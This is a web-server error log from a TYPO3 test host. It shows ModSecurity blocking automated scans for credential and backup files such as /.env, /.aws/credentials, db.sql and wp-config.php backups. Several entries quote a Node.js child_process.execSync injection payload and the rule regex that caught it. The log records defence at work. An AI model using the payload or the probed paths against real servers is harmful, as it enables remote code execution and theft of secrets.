[Tue Feb 10 09:59:31.721886 2026] [:error] [pid 1985788] [client 178.128.62.58:58054] [client 178.128.62.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aYrzc-MB_amgffDd65wFzwAAAAI"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Tue Feb 10 09:59:32.036612 2026] [authz_core:error] [pid 1985788] [client 178.128.62.58:58054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.sql, referer: http://surf.test.indacotrentino.com/db.sql
[Tue Feb 10 09:59:32.341621 2026] [authz_core:error] [pid 1985788] [client 178.128.62.58:58054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql, referer: http://surf.test.indacotrentino.com/backup.sql
[Tue Feb 10 09:59:32.646809 2026] [authz_core:error] [pid 1985788] [client 178.128.62.58:58054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.sqlite, referer: http://surf.test.indacotrentino.com/db.sqlite
[Tue Feb 10 09:59:33.275636 2026] [authz_core:error] [pid 1985788] [client 178.128.62.58:58054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db1.sql, referer: http://surf.test.indacotrentino.com/db1.sql
[Tue Feb 10 09:59:33.630814 2026] [authz_core:error] [pid 1985788] [client 178.128.62.58:58054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git, referer: http://surf.test.indacotrentino.com/.git/config
[Tue Feb 10 09:59:34.349953 2026] [authz_core:error] [pid 1985788] [client 178.128.62.58:58054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak, referer: http://surf.test.indacotrentino.com/wp-config.php.bak
[Tue Feb 10 09:59:34.711819 2026] [:error] [pid 1985788] [client 178.128.62.58:58054] [client 178.128.62.58] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php-backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php-backup"] [unique_id "aYrzduMB_amgffDd65wF2AAAAAI"], referer: http://surf.test.indacotrentino.com/wp-config.php-backup
[Tue Feb 10 09:59:34.712098 2026] [:error] [pid 1985788] [client 178.128.62.58:58054] [client 178.128.62.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php-backup"] [unique_id "aYrzduMB_amgffDd65wF2AAAAAI"], referer: http://surf.test.indacotrentino.com/wp-config.php-backup
[Tue Feb 10 09:59:34.712299 2026] [:error] [pid 1985788] [client 178.128.62.58:58054] [client 178.128.62.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php-backup"] [unique_id "aYrzduMB_amgffDd65wF2AAAAAI"], referer: http://surf.test.indacotrentino.com/wp-config.php-backup
[Tue Feb 10 09:59:35.830485 2026] [authz_core:error] [pid 1985788] [client 178.128.62.58:58054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml, referer: http://surf.test.indacotrentino.com/aws.yml
[Thu Feb 12 15:49:52.663980 2026] [:error] [pid 2042621] [client 204.76.203.25:46148] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY3okAYJLpaCPvUBhPAtfgAAAAA"]
[Thu Feb 12 15:49:52.665447 2026] [:error] [pid 2042621] [client 204.76.203.25:46148] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY3okAYJLpaCPvUBhPAtfgAAAAA"]
[Thu Feb 12 15:49:52.665624 2026] [:error] [pid 2042621] [client 204.76.203.25:46148] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY3okAYJLpaCPvUBhPAtfgAAAAA"]
[Fri Feb 13 07:20:43.245484 2026] [:error] [pid 2051734] [client 141.98.11.171:10743] [client 141.98.11.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY7Cu2kJnRXOdFgq9LVcOgAAAAI"]
[Fri Feb 13 07:20:43.245719 2026] [:error] [pid 2051734] [client 141.98.11.171:10743] [client 141.98.11.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY7Cu2kJnRXOdFgq9LVcOgAAAAI"]
[Fri Feb 13 07:20:43.245886 2026] [:error] [pid 2051734] [client 141.98.11.171:10743] [client 141.98.11.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY7Cu2kJnRXOdFgq9LVcOgAAAAI"]
[Fri Feb 13 07:20:43.283283 2026] [:error] [pid 2051734] [client 141.98.11.171:10743] [client 141.98.11.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY7Cu2kJnRXOdFgq9LVcOwAAAAI"]
[Fri Feb 13 07:20:43.283479 2026] [:error] [pid 2051734] [client 141.98.11.171:10743] [client 141.98.11.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY7Cu2kJnRXOdFgq9LVcOwAAAAI"]
[Fri Feb 13 07:20:43.283642 2026] [:error] [pid 2051734] [client 141.98.11.171:10743] [client 141.98.11.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY7Cu2kJnRXOdFgq9LVcOwAAAAI"]
[Sun Feb 15 19:17:21.070660 2026] [:error] [pid 2109443] [client 185.93.89.136:33280] [client 185.93.89.136] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZINsa3XyjyxUtW8IyadpQAAAAY"]
[Sun Feb 15 19:17:21.072740 2026] [:error] [pid 2109443] [client 185.93.89.136:33280] [client 185.93.89.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZINsa3XyjyxUtW8IyadpQAAAAY"]
[Sun Feb 15 19:17:21.072927 2026] [:error] [pid 2109443] [client 185.93.89.136:33280] [client 185.93.89.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZINsa3XyjyxUtW8IyadpQAAAAY"]
[Tue Feb 17 20:28:39.729012 2026] [:error] [pid 2139754] [client 204.76.203.25:42292] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZTBZ7JoqS_d6YhhQb1oTgAAAAY"]
[Tue Feb 17 20:28:39.730442 2026] [:error] [pid 2139754] [client 204.76.203.25:42292] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZTBZ7JoqS_d6YhhQb1oTgAAAAY"]
[Tue Feb 17 20:28:39.730602 2026] [:error] [pid 2139754] [client 204.76.203.25:42292] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZTBZ7JoqS_d6YhhQb1oTgAAAAY"]
[Wed Feb 18 03:31:52.595069 2026] [authz_core:error] [pid 2161192] [client 46.191.138.29:50582] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Wed Feb 18 03:31:52.819526 2026] [authz_core:error] [pid 2161191] [client 46.191.138.29:41360] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.lock
[Wed Feb 18 03:31:53.042134 2026] [authz_core:error] [pid 2161193] [client 46.191.138.29:50620] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.composer
[Wed Feb 18 18:14:20.677275 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZXzbEVZhN-wTu6C5d5nkAAAAAA"]
[Wed Feb 18 18:14:20.677848 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZXzbEVZhN-wTu6C5d5nkAAAAAA"]
[Wed Feb 18 18:14:20.678048 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZXzbEVZhN-wTu6C5d5nkAAAAAA"]
[Wed Feb 18 18:14:20.703369 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aZXzbEVZhN-wTu6C5d5nkQAAAAA"]
[Wed Feb 18 18:14:20.703941 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aZXzbEVZhN-wTu6C5d5nkQAAAAA"]
[Wed Feb 18 18:14:20.704140 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aZXzbEVZhN-wTu6C5d5nkQAAAAA"]
[Wed Feb 18 18:14:20.724730 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aZXzbEVZhN-wTu6C5d5nkgAAAAA"]
[Wed Feb 18 18:14:20.725267 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aZXzbEVZhN-wTu6C5d5nkgAAAAA"]
[Wed Feb 18 18:14:20.725445 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aZXzbEVZhN-wTu6C5d5nkgAAAAA"]
[Wed Feb 18 18:14:20.847137 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aZXzbEVZhN-wTu6C5d5nkwAAAAA"]
[Wed Feb 18 18:14:20.847688 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aZXzbEVZhN-wTu6C5d5nkwAAAAA"]
[Wed Feb 18 18:14:20.847924 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aZXzbEVZhN-wTu6C5d5nkwAAAAA"]
[Wed Feb 18 18:14:20.873149 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aZXzbEVZhN-wTu6C5d5nlAAAAAA"]
[Wed Feb 18 18:14:20.873646 2026] [:error] [pid 2161190] [client 195.178.110.34:51896] [client 195.178.110.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aZXzbEVZhN-wTu6C5d5nlAAAAAA"]
